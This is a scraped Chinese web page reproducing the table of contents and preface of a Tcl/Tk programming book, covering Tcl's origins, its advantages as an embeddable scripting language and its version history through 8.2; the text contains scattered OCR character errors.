用户定义的按钮 用户定义的菜单 第29章 简单的tk组件 框架组件与顶层窗口 标签组件 消息组件 标尺组件 bell命令 第30章 滚动条 使用滚动条 滚动条协议 滚动条组件 第31章 输入条组件 使用输入条组件 输入条组件 第32章 列表框组件 使用列表框组件 列表框组件的编联 列表框组件的属 第33章 文本组件 文本索引 文本标记 文本标签 文本信息的选择( selection) 标签的编联 文本搜索 嵌入组件 图片的嵌入 查看文本组件的内部信息 文本组件的编联 文本组件的操作 文本组件的属 第34章 画布组件 画布坐标 hello, world! 最小和最大标尺的例子 画布对象 画布组件的操作 产生postscript输出 画布组件的属 建议 第5部分 tk详解 第35章 选择和剪贴板 选择模型 selection命令 clipboard命令 选择处理程序 第36章 焦点、焦点的捕获和对话框 标准对话框 定制对话框 使用update命令实现动画 第37章 tk组件的属 配置属 尺寸 边界与浮雕效果 焦点的高亮显示 补自(padding)与挂靠(anchor) 第38章 颜色、图片和鼠标指针 颜色 色彩映射与视频种类 位图和图片 文本插入光标 鼠标指针 第39章 字体与文本属 字体命名 x字体名 字模 font命令 文本属 栅格化、尺寸调整和布局 一个字体选择应用程序 第40章 send send命令 发送者脚本 通信进程 通过套接字来实现远程eval 第41章 窗口管理器与窗口信息 win命令 winfo命令 tk命令 第42章 管理用户首选项 应用默认设置文件 定义首选项 首选项的用户界面 管理首选项文件 跟踪对首选项变量的修改 对该软件包的改进 第43章 一种操作编联的用户界面 一对协调工作的列表框 编辑界面 保存与加载编联 第6部分 c语言编程 第44章 c语言编程与tcl 基本概念 创建可加载软件包 一个用c语言实现的命令过程 blob命令的例于 字符串与国际化 tolmain和tcl-applnit tk_main 事件循环 从c中调用脚本 第45章 编译tci及扩展模块 标准目录结构 从源代码建立tci 使用占位函数库(stub library) 使用autoconf 扩展模块范例 makefile.in 第46章 使用c语言编写tk组件 初始化扩展模块 组件的数据结构 组件的类命令 组件实例命令 配置和重新配置属 指定组件属 时钟的显示 窗口事件过程 最后的清除工作 第47章 c函数库概览 tclc函数库概览 tk c函数库概览 第7部分 各版本之间的差异 第48章 tcl 7.4/tk 4.0 wish 过时废弃的功能 cgct操作 输入焦点的高亮显示 编联 滚动条接日 pack info 焦点 send命令 按钮的内部补白 单选按钮的值 输入条组件 菜单 列表框 没有了geometry属 文本组件 颜色属 颜色分配与tk colormodel 画布组件的scrollincrement 选择 bell命令 第49章 tcl 7.5/tk 4.1 跨平台脚本 clock命令 load命令 package命令 多个foreach循环变量 事件循环从tk转移到了tcl 网络套接字 多解释器与safe-tcl grid布局管理器 文本组件 输入条组件 第50章 tcl7.6/tk 4.2 更多的file操作 虚拟事件 标准对话框 新的grid布局管理器 macintosh的unsupportedl命令 第51章 tcl/tk 8.0 tcl编译器 名字空间 safe-tcl 新的lsort tcl_precision变量 2000年约定 http软件包 串行线i/o 独立于平台的字体 tk scaling命令 应用程序的嵌入 本地化菜单与菜单条 cde的边界宽度 本地化的按钮和滚动条 文本组件中的图片 destroy不再产生错误 grid rowconfigure 补丁版本 第52章 tcl/tk 8.1 unicode与国际化 线程安全 高级正则表达式 新字符串命令 dde扩展模块 杂类 第53章 tcl/tk 8.2 trf补丁 更快的字符串操作 空数组名 浏览器插件的兼容 第54章 tcl/tk 8.3 关于tcl的修改建议 关于tk的改动建议 第55章 有关本书的cd-rom ↓展开全部内容 序言回到顶部↑Tcl为工具命令语言(Tool Command Language)的缩写。它其实是指两样东西:一种脚本语言,以及该脚本语言的解释器。该解释器可以很容易地嵌入到你的应用程序中。Tcl和与之关联的图形用户界面工具包(Tk)是由加州大学的John Ousterhout教授设计并编写的。尽管它是个商用软件包,但你也可以在Internet上找到它(见第VII页),而且可以在自己的应用程序中自由使用这个软件包。Tcl解释器已经从Unix平台移植到了DOS、Windows、OS/2、NT以及Macintosh环境中,而TK工具包也从X window系统移植到了Windows和Macintosh环境中。 1988年,当我在Berkeley做ousterhout教授的博士生时,第一次听说了Tcl。我们当时正在设计一种名为Sprite的网络操作系统。同学们在努力编制一个新式的内核程序,而John编写了一个新的编辑器和终端仿真程序。他使用Tcl作为这两种工具的命令语言,这样用户就可以定义菜单或者对那些程序进行定制。那时还处在使用X10的时代,他计划编写一个基于Tcl的X工具包,以使程序之间通过Tcl命令进行通信,彼此相互协作。对我来说,这种工具之间的相互协作就是Tcl的实质。 这种早期的设想就是让应用程序由包含编译代码的大块实体和一小部分用于进行配置和编写高级命令的Tcl代码组成。John的编辑器皿,还有终端仿真程序tx就遵循了这种模式。虽然这种模式仍然是有效的,但结果表明用Tcl来编写整个应用程序也是可能的。这是因为Tcl/Tk的shell程序wish提供了对其他程序、文件系统和网络套接字的存取功能,同时还能够创建图形用户界面。不管怎样,现在发现包含几千行Tcl脚本的应用程序并不稀奇。 我编写这本书的原因就是,虽然自己觉得使用Tcl与Tk既有乐趣又高效,但是也有令人头痛的时候。此外,在Xerox PARC工作,那里有许多语言和系统上的专家,我不得不强迫自己去理解Tcl/Tk的长处和弱点。我的许多同事都在他们的项目中采用了Tcl和Tk,但是他们也很快指出了它的缺点。因此,我就总结了一套编程技巧以充分利用Tcl/Tk的强大功能,同时回避一些棘手的问题。这本书就是一本帮助你最大限度地利用Tcl/Tk并回避一些我所经历过的令人头痛的问题的实用编程指南。 我接触Tcl语言大概已经有10年的时间了,而本书的第一版也已经出版5年了。在过去的几年中,我一直在John Ousterhout的手下工作,最初是在Sun微系统公司,而现在是在Scriptics公司。我一直使自己在很大程度上保持着一个Tcl程序员的角色,而我们工作组中的其他人员则埋头于Tcl本身的C语言实现。我创建的应用程序有HTML编辑器、EMAIL比用户接口程序、Web服务器以及用户数据库,我们的商务应用就建立在它们的基础上。这些经历在本书中有所反映。本书的大部分内容是有关Tcl脚本编程的,而有关使用C语言来创建Tcl扩展模块的内容没有着重讲述。我有幸一直参与Tcl核心技术的开发活动,希望通过本书能够将自己使用Tcl时获得的切身体会表达出来。 为什么要使用Tcl 作为一种脚本语言,Tcl与其他的Unix shell语言,如Bourne Shell(sh)、C Shell(csh)、Korn Shell以及Perl类似。Shell程序可以让你执行其他的程序。它们提供了足够的可编程特(变量、流程控制和过程),使你可以将现有程序组装成符合自己需要的复杂的脚本程序。Shell程序非常适用于一些日常任务的自动化处理工作。 Tcl解释器可以很容易地添加到你的应用程序中,这种能力将它与其他的shell语言区分开来。Tcl扮演了一种扩展语言的角色,用来配置和定制应用程序。你没有必要再去为自己的新应用程序发明一种命令语言,或是费力为自己的工具提供某种用户可编程特。其实,你可以通过添加一个Tcl解释器,来将自己的应用程序组织成一组操作原语,并使用这些原语来构造最符合用户需求的脚本程序。这样还可以允许其他的程序通过编程来控制你的应用程序,以使套装应用程序能够很好地在一起工作。 Tcl的C函数库拥有清晰的接口而且便于使用。该函数库实现了基本的解释器,它有一套实现变量、流程控制和过程的核心脚本命令,而且还有一组用来存取操作系统服务以运行其他程序、存取文件系统和使用网络套接字的命令。Tcl和Tk提供了一台可以在UNIX、Windows和Macintosh环境中可移植的"虚拟机"。 因为你的应用程序可以定义新的Tcl命令,所以Tcl虚拟机是可扩展的。这些命令与你的应用程序所提供的C或C++过程关联。结果应用程序就分割成一组用编译语言编写的原语,并输出成为相应的Tcl命令。使用Tcl脚本程序可以将这些原语组装成完整的应用程序。脚本语言层可以存取与shell类似的功能以运行其他的程序,可以存取文件系统,还可以直接通过自己定义的Tcl命令来调用应用程序中编译的代码部分。此外,从C编程的层面上来说,你还可以调用Tcl脚本程序、设置和询问Tcl变量,甚至跟踪Tcl解释器的执行。 在Internet上有许多可自由使用的Tcl扩展模块。许多扩展模块都包含了一个提供某种新功能的C函数库,以及该函数库的Tcl接口。这样的例子包括数据库存取、电话控制、MIDI控制器存取,还有expect,它为控制交互式程序增加了一组Tcl命令。 最为著名的扩展模块就是Tk,这是一种图形用户界面工具包。Tk定义了用来创建和操作用户界面组件的Tcl命令。这种基于脚本的用户界面编程方法有三个好处: . 由于快速的响应周期,所以开发迅速,不存在漫长的编译等待过程。 . Tcl命令提供了一种比绝大多数由标准C函数库实现的用户界面工具包更为高级的接口。它只需一小组命令就可以定义简单的用户界面,同时又可以对用户界面进行细化以恰当地实现每一个细节。快速的响应周期又为这种细化过程提供了帮助。 用户界面处理可以从你的应用程序的其余部分分离出来。因而开发人员能够专心致志地实现应用程序的核心部分,然后再颇为轻松地构建出用户界面。Tk组件的核心功能通常能够满足你所有的用户界面需求。不过,你还可以用C语言来编写定制的Tk组件,而且网上还有许多大家提供的Tk组件可以使用。 还有其他可以用做扩展语言的选择,这包括VisualBasic、Scheme、Elisp、Perl;Python和Javascript等,你可以依照个人喜好从中进行选择。Tcl拥有简单的结构,而且还有些地方类似于C语言,可以通过编制C过程来增添新的Tcl原语。Tcl非常易学,许多有关用户使用Tcl在很短的时间内(例如几个星期)就完成了相当难度的项目,并且他们以前压根就没有接触过Tcl。 当本书第一次出版时,Java轰动了计算机界。Java是一种极为优秀的系统编程语言,长远来看还有可能代替C和C什语言。这对Tcl来说挺好,它在设计时就被用来将由任意系统编程语言编写的构件粘连起来。Tcl过去被设计与C语言一起工作,但是现在已经被改造成能够与Java虚拟机一起工作。在我们提到"C或C++"的地方,现在也可以说"C、C++或Java"了,但是对于Java来说,其细节上还多少存在些差异。这本书并没有描述TcVJava接口,但是你可以在CD-ROM上找到TclBlend。TclBlend将Java虚拟机加载到你的Tc3应用程序中并允许你调用Java方法,它还可以让你使用Java而不是C或C十十来实现Tcl命令。 Javascript是一种来自于Netscape的语言,它被设计用来编写与w曲页面进行交互的脚本程序。由于Netscape的广泛使用,Javascript就显得很重要,然而Tcl提供了一种更为通用的脚本方案,可以在更为广泛的范围中使用。Tcl/Tk的Web浏览器插件提供了一种在浏览器中运行Tcl的方式,结果使得Tcl更像是一种Java的替代品而不是Javascript的替代品。该插件可以让你在浏览器中执行Tcl应用程序,而Javascript则为你提供了对浏览器和HTML显示的精细控制。这种插件将在第20章有所描述。TcI与Tk的版本 Tcl与Tk仍在继续演变。请参看http://www.beedub.com/book/来了解有关最新的Tcl版本的更新和消息。由于历史原因,Tcl与Tk曾各有各的版本号,但是它们成对发行,并一起工作。这本书的原始版本基于Tcl7.4和Tk 4.0并有几处引用了Tk 3.6的功能。第三版已经进行了更新,它反映了直到Tcl/Tk8.2以来所增添的各种新特: . Tcl7.5和Tk 4.1的最终发布在1996年5月。这些版本的特点是将Tk移植到了Windows和Macintosh环境。它引入了Safe-Tcl安全机制,以支持网络小应用程序(Applet)的 .安全执行。它还提供了对网络套接字的支持以及一种新的输入输出(I/O)子系统,以支持高 能的事件驱动I/O。 . Tcl7.6和Tk4.2的最终发布是在1996年的10月。这些版本包含了对S池-Tcl的改进,以及对在Tk 4.1中引进的grid布局管理器的改进。跨平台的支持包括虚拟事件(例如,以<<Copy>>宋代表<Control-c>=、标准对话框,还有更多的文件操作命令。 . Tcl 7.7和Tk 4.3是内部版本,用于开发NetscapeNavigator和MicrosoftInternetExplorer Web浏览器的Tcl/Tk插件。它们的开发工作实际上与Tcl7.6和Tk 4.2并行进行。Tcl/Tt插件已经发布了许多各种平台上的版本,其中包括Solaris/SPARC、Solaris/INTEL、SunOS、Linux、Digital UNIX、IRIX、HP/UX、Windows95、Windows NT以及Macintosh。该浏览器插件支持Web页面中的Tcl小应用程序(Applet),同时使用Safe-Tcl复杂的安全机制来提供安全保证。 . Tcl8.0为Tcl新增了一个运行时用的编译器,这个编译器提供了数倍于Tcl脚本的执行速度。Tcl8.0支持内嵌空字符的字符串。编译器对脚本来说是透明的,但是扩展模块编写入员需要学习一些新的C API才能发挥它的潜力。由于John Ousterhout从Sun微系统公司到了Scriptics公司,发布8.0版的时间推迟了几年。广泛使用的版本8.0p2是在1997年完成的,但是最终的补丁版本8.0.5直到1999年春才发布。 . 在8.0时,Tk更改了版本号以与Tcl相匹配。Tk 8.0包含了一种新的独立于平台的字体机制,它还包含了本地化菜单和菜单条,以及更多的本地化组件,它们在Windows和Macintosh上拥有更好的本地化外观。 Tcl/Tk8.1新特主要包括对Unicode的完整支持,以及线程安全,这样你就可以将Tcl嵌入到多线程的应用程序中。Unicode是一种新的正则表达式引擎,它提供了在Perl5中所能找到的所有功能。Tk为找到正确的用于显示Unicode字符的字体完成了卓越的工作,它还增加了一种信息目录设施,这样你就可以编写国际化的应用程序。Tcylk 8.1的发布史中还包括了Sun到Scriptics的过渡。第一个alpha版本完成于1997年秋,而最终的补丁版本完成于1999年5月。 Tcl/Tk 8.2主要是一个进行bug修正和稳固化的版本。它对TclC函数库API进行了几处微小增补,这样无须核心补丁程序也能支持更多的扩展模块。Tcl/Tk 8.2很快在1999年夏进入最终版本。 谁应当阅读本书 本书不仅适用于熟练的编程人员,同样也适用于初学者。对于初学者和熟练编程人员来说,我建议大家仔细学习一下策1章"Tcl的基本知识"。Tcl的编程模型被设计成一种简单的模式,它与许多编程语言存在差异。该模型基于字符串替换,你对这一点的正确理解很重要,这样才能避免在复杂情况下遇到麻烦。这本书的其余部分则包含了演示如何高效地使用Tcl与Tt的例子。每一章中都有对其中所描述的Tcl命令和Tk组件进行总结的表格,以供参考。 本书假定你有一些编程经验,但是你如果是个彻头彻尾的新手也能够读下去。对Unix shell的了解将会对你有所帮助,但这并不是必须的。在那些涉及Windows系统的地方,我会提供一些背景信息。第2章详细描述了在UNIX、Windows和Macintosh上使用Tcl与Tk的内容。 如何阅读本书 本书最好能在上机实习中使用,可以在计算机上尝试一下书中的例子。Tcl与Tk的命令手册尽管完整但却缺少上下文的的相关信息和例子,本书就试图填补在简明手册与现有的文档化或没有很好文档化的Tcl程序之间的空隙。 我推荐使用联机手册来查阅有关的Tcl/Tk命令。它为每个命令都提供了详细的参考指南,但是它没能提供完整的细节,这在每一次发布的版本中都有所不同。HTML版本的联机手册可以在随书的CD-ROM中找到。

6,849

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧